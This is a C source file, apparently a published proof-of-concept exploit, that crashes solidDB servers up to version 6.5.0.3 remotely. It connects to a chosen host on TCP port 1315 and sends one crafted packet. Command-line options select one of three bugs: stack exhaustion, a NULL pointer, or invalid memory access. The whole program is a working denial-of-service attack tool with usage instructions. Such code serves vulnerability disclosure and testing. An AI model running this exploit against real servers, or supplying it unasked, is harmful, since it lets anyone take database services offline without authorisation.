/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        1315
#define BUFFSZ      0xffff



int putcc(u8 *data, int chr, int size);
int putxx(u8 *data, u32 num, int bits);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer;
    int     sd,
            i,
            bug;
    u16     port    = PORT;
    u8      *host,
            *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "solidDB <= 6.5.0.3 Denial of Service "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            " 1 = stack exaustion\n"
            " 2 = NULL pointer\n"
            " 3 = invalid memory access\n"
            "\n", argv[0], port);
        exit(1);
    }
    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err();

    p = buff;
    *p++ = 0x02;
    *p++ = 0x00;
    *p++ = 0x00;
    p += putxx(p, 0,    16);    // 0 to 0xc
    p += putxx(p, 0x11, 16);    // 0 to 0x1a
    p += putxx(p, 0,    32);
    p += putxx(p, 0,    32);
    p += putxx(p, 0,    32);
    p += putxx(p, 0,    32);
    p += putxx(p, 0x00000000, 32);

    if(bug == 1) {
        for(i = 0; (((p - buff) + 4) < BUFFSZ); i++) {
            p += putxx(p, 15100, 32);
        }

    } else if(bug == 2) {
        p += putxx(p, 15100, 32);

    } else if(bug == 3) {
        for(i = 0; i < 100; i++) {
            p += putxx(p, 15100, 32);
        }
        for(i = 0; (((p - buff) + 4) < BUFFSZ); i++) {
            p += putxx(p, 10000, 32);
        }

    } else {
        printf("\nError: wrong bug number (%d)\n", bug);
        exit(1);
    }

    printf("- send malformed data\n");
    send(sd, buff, p - buff, 0);
    //recv(sd, buff, BUFFSZ, 0);

    close(sd);

    printf("- done\n");
    return(0);
}



int putcc(u8 *data, int chr, int size) {
    memset(data, chr, size);
    return(size);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        //data[i] = num >> ((bytes - 1 - i) << 3);
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


